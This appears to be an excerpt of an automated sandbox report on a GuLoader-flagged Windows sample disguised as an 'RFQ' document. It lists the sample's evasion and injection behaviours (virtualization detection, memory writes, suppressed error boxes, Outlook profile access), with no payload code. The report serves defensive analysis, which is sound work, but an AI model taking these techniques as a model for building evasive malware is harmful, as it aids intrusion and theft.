Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225B2DB
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225B6DB
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02257F2F
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251F3D
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225833D
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225873D
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225A33B
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225B304
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225230C
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02253B0C
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251310
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02259310
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225271F
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02252366
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02256F63
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258F63
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225B76D
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258B72
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02260B7D
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02252B49
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225FB4A
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02257F55
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225A35F
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258B58
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022513BF
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02262795
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02255B90
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02254F9D
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02254F9F
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258FEC
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02257FEE
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225B3E8
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02256FEB
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022583F7
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022523FB
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022527C0
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225B7D5
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251FD0
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022587DF
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258C2B
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258035
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225B435
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02255837
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02255037
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02255C33
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0226083D
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225583A
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02260C17
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258864
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225086D
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02260C6C
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258068
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225847A
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02260843
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251C4B
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225085C
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02252859
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022558B4
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225A8B7
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225908C
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225249F
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022520FC
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022550CF
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022580CF
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225B0DF
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225B4DE
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225ED22
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225912D
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02252536
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258530
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225C133
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258D3F
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258D14
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0226091C
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251D19
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258118
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225B571
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225BD7B
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225894C
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225814F
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251D4B
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258557
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0226095F
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022531A8
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022581B0
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02256DB9
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022575BA
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022519BA
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251983
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02256D91
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022529E4
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022511E2
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022609EE
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022559EE
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251DF3
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022585F3
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022511F2
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022591D7
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022531D2
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225B5DD
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022525D8
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022529D8
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225A9D8

Source: RFQ No3756368.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: RFQ No3756368.exe, 00000000.00000002.722456646.00000000029E0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameStenrkens6.exeFE2XAtlassian vs RFQ No3756368.exe
Source: RFQ No3756368.exe, 00000000.00000000.647409635.0000000000423000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameStenrkens6.exe vs RFQ No3756368.exe
Source: RFQ No3756368.exe, 00000000.00000002.721984411.00000000021F0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs RFQ No3756368.exe
Source: RFQ No3756368.exe, 00000002.00000002.815645636.000000001DDB0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs RFQ No3756368.exe
Source: RFQ No3756368.exe, 00000002.00000002.815687356.000000001DF00000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs RFQ No3756368.exe
Source: RFQ No3756368.exe, 00000002.00000000.721010536.0000000000423000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameStenrkens6.exe vs RFQ No3756368.exe
Source: RFQ No3756368.exe	Binary or memory string: OriginalFilenameStenrkens6.exe vs RFQ No3756368.exe

Source: RFQ No3756368.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@3/2@1/2

Source: C:\Users\user\Desktop\RFQ No3756368.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto

Jump to behavior

Source: C:\Users\user\Desktop\RFQ No3756368.exe

Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430

Source: RFQ No3756368.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\RFQ No3756368.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Source: C:\Users\user\Desktop\RFQ No3756368.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\Desktop\RFQ No3756368.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\RFQ No3756368.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: RFQ No3756368.exe

Virustotal: Detection: 26%

Source: unknown	Process created: C:\Users\user\Desktop\RFQ No3756368.exe 'C:\Users\user\Desktop\RFQ No3756368.exe'
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process created: C:\Users\user\Desktop\RFQ No3756368.exe 'C:\Users\user\Desktop\RFQ No3756368.exe'
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process created: C:\Users\user\Desktop\RFQ No3756368.exe 'C:\Users\user\Desktop\RFQ No3756368.exe'

Source: C:\Users\user\Desktop\RFQ No3756368.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: RFQ No3756368.exe, type: SAMPLE
Source: Yara match	File source: 0.2.RFQ No3756368.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.RFQ No3756368.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.RFQ No3756368.exe.400000.0.unpack, type: UNPACKEDPE

Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0040A456 push edi; retf
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_00406437 push 56246918h; retf
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0040A4D6 push esi; ret
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0040A4D9 push esi; ret
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0040DCF7 push edi; retf
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_00408501 push ecx; retf
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0040FD2E push edi; retf
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0040A137 push edi; retf
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_00410D3A push esi; retf
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_004085C8 push ecx; retf
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0040A1DE push edi; ret
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_00410D8C push esi; retf
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0040A5A6 push esi; ret
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0040D5B9 push eax; iretd
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0040824B push esi; ret
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0040FE51 push esi; retf
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_00408A55 push esi; retf
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0040DE65 push edi; ret
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0040BA69 push edi; retf
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_00407E06 push ecx; retf
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_00406E11 push esi; retf
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_00409E1B push esi; retf
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0040DEE4 push ebx; retf
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_00406EFA push esi; ret
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0040A293 push edi; ret
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0040E2B7 push ebp; iretd
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_00410FDE push ebp; iretd
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_00409FFF push edi; retf
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0040E381 push edi; retf
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_00408F8A push edi; ret
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0040BB96 push edi; retf

Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process information set: NOGPFAULTERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251014 EnumWindows,NtWriteVirtualMemory,LoadLibraryA,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251973 NtWriteVirtualMemory,TerminateProcess,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225A99B NtWriteVirtualMemory,NtAllocateVirtualMemory,LoadLibraryA,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258E3C NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258A39 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225223A TerminateProcess,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258212 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02262A65
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02262A77
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02262A72
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251E43 TerminateProcess,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02256E42
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251A56 TerminateProcess,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251E5B TerminateProcess,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022582A2 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251EAF TerminateProcess,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022586A8 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251AFF TerminateProcess,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258ACF NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02256ECE
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225B2DB NtWriteVirtualMemory,LoadLibraryA,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251F3D TerminateProcess,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225833D NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225873D NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225230C TerminateProcess,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02252366 TerminateProcess,
